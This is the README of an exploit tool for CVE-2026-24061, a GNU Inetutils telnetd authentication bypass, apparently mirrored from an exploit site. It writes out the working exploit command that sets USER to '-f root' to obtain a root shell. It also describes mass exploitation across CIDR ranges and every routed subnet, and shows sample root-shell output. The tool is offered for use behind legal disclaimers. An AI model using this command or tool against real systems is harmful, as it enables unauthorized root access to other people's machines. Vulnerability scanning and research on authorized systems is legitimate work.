Share
## https://sploitus.com/exploit?id=5998B40D-F1DF-5793-BC21-D4EF388DE42E
# Telnetd Auth Bypass Scanner (CVE-2026-24061)

A Python-based scanner for detecting and exploiting the CVE-2026-24061 vulnerability in GNU Inetutils telnetd services. This tool scans IP addresses or networks for vulnerable telnetd services that allow authentication bypass leading to root shell access.

---

## ⚠️ IMPORTANT LEGAL NOTICE AND DISCLAIMER

**THIS SOFTWARE IS PROVIDED FOR EDUCATIONAL AND AUTHORIZED SECURITY TESTING PURPOSES ONLY.**

### 1. Educational Purpose
This application has been developed **solely for educational purposes** to demonstrate security vulnerabilities and to assist in authorized security testing and research.

### 2. No Warranty
**THIS SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED**, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. **THE AUTHORS AND CONTRIBUTORS DO NOT GUARANTEE THAT THE SOFTWARE WILL BE ERROR-FREE, SECURE, OR FUNCTIONAL.** The software may contain bugs, errors, or other defects.

### 3. User Responsibility
**ALL RESPONSIBILITY AND LIABILITY FOR THE USE OF THIS SOFTWARE RESTS ENTIRELY WITH THE USER.** The authors, contributors, and distributors of this software shall not be held liable for any damages, losses, or legal consequences resulting from the use, misuse, or inability to use this software.

### 4. Unauthorized Use Prohibited
This tool must **ONLY be used on systems you own or have explicit written permission to test.** Unauthorized access to computer systems is illegal and may result in criminal prosecution.

### 5. No Guarantees
The authors do **NOT** guarantee:
- The accuracy of scan results
- The security of the application itself
- Compatibility with all systems
- Absence of bugs or errors
- Any specific functionality or performance

**By using this software, you acknowledge that you have read, understood, and agree to be bound by these terms. If you do not agree, do not use this software.**

---

## Developer

**Developed by:** Cuma KURT  
**Email:** cumakurt@gmail.com  
**LinkedIn:** https://www.linkedin.com/in/cuma-kurt-34414917/

## Vulnerability Information

**CVE-2026-24061**: GNU Inetutils telnetd through version 2.7 allows remote authentication bypass via a `-f root` value for the USER environment variable.

**CVSS Score**: 9.8 (Critical)

**Reference**: [NVD CVE-2026-24061](https://nvd.nist.gov/vuln/detail/CVE-2026-24061)

## Features

- πŸ” **Port Scanning**: Detects open telnet ports (default: 23, customizable)
- 🎯 **Vulnerability Detection**: Tests for CVE-2026-24061 exploitability
- ⚑ **Multi-threaded**: Fast concurrent scanning with configurable thread count
- πŸ“ **Flexible Input**: Supports IP addresses, CIDR networks, and file-based target lists
- πŸ—ΊοΈ **Auto-Detection**: Automatically detect and scan subnets from routing table
- πŸ›‘ **Safe Interrupt**: Ctrl+C safely stops scan and shows partial results
- πŸ“Š **Real-time Progress**: Progress bar with statistics and findings

## Installation

### Prerequisites

- Python 3.6 or higher
- `telnet` client (usually pre-installed on Linux/macOS)

### Install Dependencies

```bash
pip3 install -r requirements.txt
```

**Note**: Most dependencies are part of Python standard library. The tool works out of the box with Python 3.6+.

## Usage

### Basic Usage

```bash
# Scan a single IP address
python3 tscan.py 192.168.1.1

# Scan a CIDR network
python3 tscan.py 192.168.1.0/24

# Scan with custom port
python3 tscan.py -p 2323 192.168.1.1

# Scan targets from a file
python3 tscan.py targets.txt

# Scan multiple IP addresses
python3 tscan.py 192.168.1.1 10.0.0.1 172.16.0.1

# Scan multiple CIDR networks
python3 tscan.py 192.168.1.0/24 10.0.0.0/16
```

### Performance Tuning

```bash
# Increase thread count for faster scanning (100 threads)
python3 tscan.py -t 100 192.168.1.0/24

# Increase timeout for slow networks
python3 tscan.py --timeout 10 192.168.1.0/24

# Combine both for large network scans
python3 tscan.py -t 200 --timeout 8 10.0.0.0/16
```

### Auto-Detection Mode

```bash
# Automatically detect and scan all subnets from system routing table
python3 tscan.py --auto
# or use short form:
python3 tscan.py -a

# Auto-detect with custom port
python3 tscan.py --auto -p 2323
# or:
python3 tscan.py -a -p 2323

# Auto-detect with high thread count
python3 tscan.py --auto -t 200
# or:
python3 tscan.py -a -t 200
```

**Note**: `--auto` mode reads the system routing table using `ip route list` or `route -n` command and automatically scans all detected subnets.

### Real-World Examples

```bash
# Example 1: Quick scan of local network
python3 tscan.py 192.168.1.0/24

# Example 2: Fast scan with high concurrency
python3 tscan.py -t 300 --timeout 3 10.0.0.0/16

# Example 3: Scan non-standard telnet port
python3 tscan.py -p 2323 192.168.1.0/24

# Example 4: Auto-detect and scan all local network subnets
python3 tscan.py --auto
# or:
python3 tscan.py -a

# Example 5: Auto-detect with custom settings
python3 tscan.py --auto -p 2323 -t 100 --timeout 8
# or:
python3 tscan.py -a -p 2323 -t 100 --timeout 8
```

### Command Line Options

```
positional arguments:
  targets               IP address(es), CIDR network(s), or file path(s) containing targets

options:
  -h, --help            show this help message and exit
  -p, --port PORT       Telnet port to scan (default: 23)
  -t, --threads THREADS Number of concurrent threads (default: 50)
  --timeout TIMEOUT     Connection timeout in seconds (default: 5)
  -v, --verbose         Verbose output
  -a, --auto            Automatically detect and scan all subnets from system routing table (route -n or ip route list)
```

## Input File Format

Create a text file with one target per line:

```
192.168.1.1
192.168.1.0/24
10.0.0.1
172.16.0.0/16
```

Lines starting with `#` are treated as comments and ignored.

## Output

The tool provides:

1. **Real-time Progress**: Shows results as they are discovered
   - Progress bar with percentage and statistics
   - Vulnerable host count displayed in progress bar
   - `[!]` - Vulnerable host
   - `[~]` - Port open but not vulnerable
   - Port closed targets are silently skipped
   - **Ctrl+C (KeyboardInterrupt)**: Safely interrupts scan and shows partial results immediately

2. **Summary Report**: Includes:
   - Total telnet services found
   - Number of vulnerable hosts
   - Detailed list of vulnerable hosts

### Example Output

#### Basic Scan Output

```
[*] Starting scan on 256 target(s)...
[*] Port: 23, Threads: 50, Timeout: 5s

[*] Progress: [β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘] 40.0% (102/256) | Open: 2 | Vulnerable: 1
[!] 192.168.1.100:23 - VULNERABLE
[*] Progress: [β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ] 100.0% (256/256) | Open: 3 | Vulnerable: 1
[+] Scan completed: 256/256 targets scanned

======================================================================
Scan Results Summary
======================================================================

Telnet services found: 3
Vulnerable hosts: 1

[!] VULNERABLE HOSTS:

  ● 192.168.1.100:23
    Output: uid=0(root) gid=0(root) groups=0(root)...

[~] Telnet services found but not vulnerable:

  ● 192.168.1.101:23
  ● 192.168.1.102:23

[*] Scan completed in 12.34 seconds
```

## How It Works

1. **Port Detection**: Checks if telnet port is open on target IPs
2. **Exploit Attempt**: For open ports, attempts the CVE-2026-24061 exploit:
   - Sets `USER="-f root"` environment variable
   - Connects via `telnet -a` command
   - Sends test commands to verify root shell access
3. **Result Classification**: Categorizes results as vulnerable or not vulnerable

## Exploit Details

The vulnerability allows authentication bypass by setting the `USER` environment variable to `-f root`:

```bash
USER="-f root" telnet -a TARGET_IP [PORT]
```

This causes telnetd to interpret the USER variable as a flag, bypassing authentication and granting root access.

## Limitations

- Requires `telnet` client to be installed
- Only works against vulnerable telnetd versions (≀ 2.7)
- Auto-detection mode requires `ip route list` or `route -n` command

## Troubleshooting

### "telnet command not found"
Install telnet client:
```bash
# Debian/Ubuntu
sudo apt-get install telnet

# CentOS/RHEL
sudo yum install telnet

# macOS
# Usually pre-installed
```

### No results found
- Verify targets are reachable
- Check firewall rules
- Ensure telnet services are actually running
- Try increasing timeout: `--timeout 10`

## Legal and Ethical Use

This tool is intended for:
- βœ… Authorized penetration testing
- βœ… Security research on your own systems
- βœ… Vulnerability assessment with proper authorization
- βœ… Educational purposes in controlled environments

**DO NOT use this tool for:**
- ❌ Unauthorized access to systems
- ❌ Illegal hacking activities
- ❌ Any activity without explicit permission

## References

- [CVE-2026-24061 Details](https://nvd.nist.gov/vuln/detail/CVE-2026-24061)
- [SafeBreach Labs Analysis](https://www.safebreach.com/blog/safebreach-labs-root-cause-analysis-and-poc-exploit-for-cve-2026-24061/)

## License

This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program.  If not, see .

### Full License Text

See [LICENSE](LICENSE) file for the complete GNU General Public License v3.0 text.

## Disclaimer

**THE AUTHORS AND CONTRIBUTORS ARE NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE CAUSED BY THIS TOOL.**

This tool is provided **FOR EDUCATIONAL AND AUTHORIZED SECURITY TESTING PURPOSES ONLY**. 

**USE AT YOUR OWN RISK.** All responsibility and liability for the use of this software rests entirely with the user. The authors do not guarantee the accuracy, security, or functionality of this software. The software is provided "AS IS" without any warranty of any kind.

**This application has been developed solely for educational purposes.** By using this software, you acknowledge that:
- You understand this is an educational tool
- All responsibility for its use is yours
- The authors provide no guarantees or warranties
- You will only use it on systems you own or have explicit written permission to test
- Unauthorized use is illegal and may result in criminal prosecution

If you do not agree to these terms, **DO NOT USE THIS SOFTWARE**.